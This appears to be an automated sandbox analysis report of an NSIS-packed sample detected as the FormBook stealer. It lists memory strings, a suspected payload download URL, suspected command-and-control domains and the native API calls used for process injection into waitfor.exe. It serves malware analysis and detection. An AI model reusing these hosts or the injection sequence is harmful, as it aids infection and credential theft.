          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
          Source: 02Eh1ah35H.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.Jcsa.info
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Best_Online_University.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQh
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQhpf8k8y
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Career_Counseling.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0J
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/College_Information.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Community_College_Search.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yIml
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Course_Descriptions.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQhpf8
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Education_Grant.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0JHs
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Education_Seminars.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Japanese_Language_School.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yIml
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Language_Learning.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0J
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/display.cfm
          Source: waitfor.exe, 00000004.00000002.33483552747.000000000637E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBY
          Source: 02Eh1ah35H.exe, 00000002.00000003.28344629314.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458149111.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458638393.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458259978.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458503054.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28513958061.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28344854813.0000000003003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
          Source: waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/
          Source: 02Eh1ah35H.exe, 00000002.00000002.28573159007.00000000326D0000.00000004.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/BJuAryIbeCLh111.bin
          Source: 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/BJuAryIbeCLh111.binG
          Source: 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/BJuAryIbeCLh111.binRB
          Source: 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/BJuAryIbeCLh111.binvB
          Source: 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/ic
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
          Source: waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/%
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/5
          Source: waitfor.exe, 00000004.00000002.33487548147.00000000089B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/;
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/=
          Source: waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/?==)
          Source: waitfor.exe, 00000004.00000002.33481940541.0000000004E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/E9C:
          Source: waitfor.exe, 00000004.00000002.33487548147.00000000089B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/J
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/U
          Source: waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/V
          Source: waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/X
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
          Source: waitfor.exe, 00000004.00000002.33483552747.000000000605A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://down-sz.trafficmanager.net/?hh=
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
          Source: FxK39HI69.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: FxK39HI69.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
          Source: 02Eh1ah35H.exe, 00000002.00000003.28344629314.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458149111.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458638393.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458259978.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458503054.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28513958061.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28344854813.0000000003003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
          Source: waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
          Source: waitfor.exe, 00000004.00000003.28781638985.0000000008230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.register.com/whois.rcmx?domainName=Jcsa.info
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownHTTPS traffic detected: 122.201.127.17:443 -> 192.168.11.20:49757 version: TLS 1.2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_00405595 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405595

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333734E0 NtCreateMutant,LdrInitializeThunk,2_2_333734E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_33372B90
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_33372BC0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_33372EB0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_33372D10
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33374260 NtSetContextThread,2_2_33374260
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33374570 NtSuspendThread,2_2_33374570
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372B20 NtQueryInformationProcess,2_2_33372B20
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372B10 NtAllocateVirtualMemory,2_2_33372B10
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372B00 NtQueryValueKey,2_2_33372B00
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372B80 NtCreateKey,2_2_33372B80
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372BE0 NtQueryVirtualMemory,2_2_33372BE0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372A10 NtWriteFile,2_2_33372A10
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372AA0 NtQueryInformationFile,2_2_33372AA0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372A80 NtClose,2_2_33372A80
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372AC0 NtEnumerateValueKey,2_2_33372AC0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333729F0 NtReadFile,2_2_333729F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333729D0 NtWaitForSingleObject,2_2_333729D0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333738D0 NtGetContextThread,2_2_333738D0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372F30 NtOpenDirectoryObject,2_2_33372F30
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372F00 NtCreateFile,2_2_33372F00
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372FB0 NtSetValueKey,2_2_33372FB0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372E00 NtQueueApcThread,2_2_33372E00
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372E50 NtCreateSection,2_2_33372E50
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372E80 NtCreateProcessEx,2_2_33372E80
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372ED0 NtResumeThread,2_2_33372ED0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372EC0 NtQuerySection,2_2_33372EC0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372D50 NtWriteVirtualMemory,2_2_33372D50
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372DA0 NtReadVirtualMemory,2_2_33372DA0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052034E0 NtCreateMutant,LdrInitializeThunk,4_2_052034E0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_05202D10
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202C30 NtMapViewOfSection,LdrInitializeThunk,4_2_05202C30
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202CF0 NtDelayExecution,LdrInitializeThunk,4_2_05202CF0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202F00 NtCreateFile,LdrInitializeThunk,4_2_05202F00
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202E50 NtCreateSection,LdrInitializeThunk,4_2_05202E50
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052029F0 NtReadFile,LdrInitializeThunk,4_2_052029F0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202B00 NtQueryValueKey,LdrInitializeThunk,4_2_05202B00
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_05202B10
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202B80 NtCreateKey,LdrInitializeThunk,4_2_05202B80
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_05202B90
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_05202BC0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202A10 NtWriteFile,LdrInitializeThunk,4_2_05202A10
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202A80 NtClose,LdrInitializeThunk,4_2_05202A80
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_05202AC0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05204570 NtSuspendThread,4_2_05204570
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05204260 NtSetContextThread,4_2_05204260
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202D50 NtWriteVirtualMemory,4_2_05202D50
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202DA0 NtReadVirtualMemory,4_2_05202DA0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202DC0 NtAdjustPrivilegesToken,4_2_05202DC0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202C20 NtSetInformationFile,4_2_05202C20
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05203C30 NtOpenProcessToken,4_2_05203C30
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202C10 NtOpenProcess,4_2_05202C10
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202C50 NtUnmapViewOfSection,4_2_05202C50
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05203C90 NtOpenThread,4_2_05203C90
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202CD0 NtEnumerateKey,4_2_05202CD0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202F30 NtOpenDirectoryObject,4_2_05202F30
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202FB0 NtSetValueKey,4_2_05202FB0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202E00 NtQueueApcThread,4_2_05202E00
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202EB0 NtProtectVirtualMemory,4_2_05202EB0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202E80 NtCreateProcessEx,4_2_05202E80
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202EC0 NtQuerySection,4_2_05202EC0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202ED0 NtResumeThread,4_2_05202ED0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052029D0 NtWaitForSingleObject,4_2_052029D0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052038D0 NtGetContextThread,4_2_052038D0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202B20 NtQueryInformationProcess,4_2_05202B20
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202BE0 NtQueryVirtualMemory,4_2_05202BE0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05202AA0 NtQueryInformationFile,4_2_05202AA0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_02FD9A67 NtClose,4_2_02FD9A67
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0508F038 NtQueryInformationProcess,NtReadVirtualMemory,4_2_0508F038
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05093C58 NtResumeThread,4_2_05093C58
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05093F78 NtQueueApcThread,4_2_05093F78
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05093618 NtSetContextThread,4_2_05093618
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05094668 NtMapViewOfSection,4_2_05094668
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05093938 NtSuspendThread,4_2_05093938
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0508F9CB NtUnmapViewOfSection,4_2_0508F9CB
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05094A31 NtUnmapViewOfSection,4_2_05094A31
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_6FDF1B5F0_2_6FDF1B5F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FF3302_2_333FF330
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334E3102_2_3334E310
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333313802_2_33331380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F124C2_2_333F124C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333022452_2_33302245
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332D2EC2_2_3332D2EC
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DD1302_2_333DD130
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F1132_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3338717A2_2_3338717A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340010E2_2_3340010E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E02_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333451C02_2_333451C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EE0762_2_333EE076
